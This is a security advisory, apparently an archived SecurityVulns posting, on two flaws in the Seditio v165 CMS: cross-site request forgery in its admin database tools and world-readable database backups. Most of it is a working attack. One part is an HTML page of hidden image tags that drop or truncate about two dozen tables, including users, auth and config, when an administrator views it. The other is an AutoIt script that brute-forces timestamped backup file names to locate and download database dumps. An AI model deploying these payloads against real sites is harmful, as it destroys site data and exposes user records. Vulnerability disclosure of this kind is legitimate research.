seditio165_CSRF_and_world_readble_db_dumpissuses

2012-04-09T00:00:00
ID SECURITYVULNS:DOC:27914
Type securityvulns
Reporter Securityvulns
Modified 2012-04-09T00:00:00

Description

============================================= Vulnerable Software: Seditio v165 Downloaded from: http://seditio-eklenti.com/datas/users/1-seditio.165.rar (This version is under development of Kaan)

$ md5sum 1-seditio.165.rar 2eebc8d80f7fcd4e9a0d0659ef193488 1-seditio.165.rar ============================================= Vuln Desc: Seditio 165 is prone to CROSS SITE REQUEST FORGERY vuln. Because in administration section it uses T3 DB Tools v1.6 without any $_GET tokenization this is possible without any problem to exploitate CSRF against application and destroy/truncate database tables Second issuse is seditio 165 stores database dump files in unsafe manner(See below) ============================================== Tested: php.ini MAGIC_QUOTES_GPC OFF Safe mode off / OS: Windows XP SP2 (32 bit) Apache: 2.2.21.0 PHP Version: 5.2.17.17 mysql> select version() -> ; +-----------+ | version() | +-----------+ | 5.5.21 | +-----------+ */ =================================================

@Print screen after succesfully CSRF attack: http://s019.radikal.ru/i601/1204/1b/90552af729ad.png

====================== Seditio 165 Drop/truncate Database tables using CSRF vuln =================================== <h1>Seditio 165 Drop Database tables using CSRF vuln<br> Because usage of T3 DB Tools v1.6 without any $_GET tokenization in administration section.</h1>

<img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_posts" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_sections" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_structure" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_forum_topics" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165/t/admin.php?m=dbtools&a=drop&table=sed_logger" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pages" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pfs_folders" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_pm" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_options" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_polls_voters" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_redirecter" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_trash" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_referers" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_auth" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_banlist" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_com" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_plugins" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_users" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_online" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_config" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_core" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_groups_users" width="0" height="0"></img> <img src="http://192.168.0.15/learn/128/sed/seditio165//admin.php?m=dbtools&a=drop&table=sed_cache" width="0" height="0"></img> <!--IDEA! CTRL+H http://192.168.0.15/learn/128/sed/seditio165/ to target :D--> ====================== EOF Seditio 165 Drop Database tables using CSRF vuln ===================================

You can change &a=drop to truncate statement too In ex: <img src="http://CHANGE_TO_RTARGEt/admin.php?m=dbtools&a=truncate&table=sed_forum_posts" width="0" height="0"></img>

Another issuse is: # Theris No .htaccess file to protect database dump files from world (Hint .htaccess =>deny from all<=)

me@localhost.localdomain /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups

ls -lia

total 93 562949953537506 drwxrwxrwx+ 1 mehere ???????? 0 Apr 7 03:08 . 1407374883669468 drwxrwxrwx+ 1 mehere ???????? 0 Apr 7 03:02 .. 562949953537507 -rwxrwxrwx+ 1 mehere ???????? 370 Feb 12 21:39 index.php 1970324837100442 -rwx------+ 1 ???????? ???????? 91031 Apr 7 03:08 sed165_04.07.12-030823.sql <=== this is my dump

me@localhost.localdomain /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups

pwd

/cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups

me@localhost.localdomain /cygdrive/c/Program Files/Apache Software Foundation/Apache2.2/htdocs/learn/128/sed/seditio165/datas/backups

Since database dump potentially world readable this is possible to bruteforce for existing database dump(s) and steal it. From scratch and a bit lame but works for me at least it is Proof of concept: @Print screen bruteforce result: http://s019.radikal.ru/i614/1204/af/a16616428e18.png

==================== Bruteforcer to find existing database dump file for seditio 165 ==========================

include <inet.au3>

$prefix='sed165_'; db prefix in most cases sed_

$il='2012'; start year $ay='04' ; start month $gun='07'; start day $site='http://192.168.0.15/learn/128/sed/seditio165/datas/backups/'; //target site

cs

DO not touch

ce

$saniye=00; $deqiqe=00; $saat=03; ;~ $gun='01'

$il=StringMid($il,3,StringLen($il))

while 1

    Sleep&#40;10&#41;;
    $saniye+=1;
    if $saniye &gt;59 Then
            $saniye=&#39;00&#39;
            $deqiqe+=1;
    EndIf

if $deqiqe <10 Then $deqiqe='0' & StringMid($deqiqe,StringLen($deqiqe),1) EndIf

if $deqiqe >59 Then $deqiqe='00'; $saat+=1; EndIf

if $saat <10 Then $saat='0' & StringMid($saat,StringLen($saat),1) EndIf

if $saat >23 Then $saat='00' $gun+=1; EndIf

if $gun <10 Then $gun='0' & StringMid($gun,StringLen($gun),1) EndIf

if $gun >31 Then $gun='01'; $ay+=1; EndIf

    if $ay &lt;10 Then
            $ay=&#39;0&#39; &amp; StringMid&#40;$ay,StringLen&#40;$ay&#41;,1&#41;
    EndIf

if $ay >12 Then $ay='01'; $il+=1; EndIf

    if $saniye &lt;10  Then
  $saniye=&#39;0&#39; &amp; StringMid&#40;$saniye,1,1&#41;;
            EndIf

;~ format of dumpfile sed165_04.07.12-030823.sql $fetchitifexists=$prefix & $ay & '.' & $gun & '.' & $il & '-' & $saat & $deqiqe & $saniye &'.sql' & @CRLF ConsoleWrite('Verifying ' & $fetchitifexists & @CRLF);

    if StringInStr&#40;_INetGetSource&#40;$site &amp; $fetchitifexists,TRUE&#41;,&#39;-- T3 DB Tools&#39;,0&#41; Then
            MsgBox&#40;0,&quot;Check it out&quot;,$site &amp; $fetchitifexists,10&#41;

            FileWrite&#40;@ScriptDir &amp;&quot;&#92;wohoooo.txt&quot;,$site &amp; $fetchitifexists &amp; @CRLF&#41;
            $confirm=MsgBox&#40;65,&quot;Exit or continue?&quot;,&quot;Exit or Continue?&quot;&#41;
            if $confirm=1 Then
                    MsgBox&#40;48,&quot;Bye&quot;,&quot;Byeeee xD&quot;&#41;;
                    Exit
                    EndIf
            EndIf

WEnd

========================== EOF bruteforcer ============================================================

/AkaStep ^_^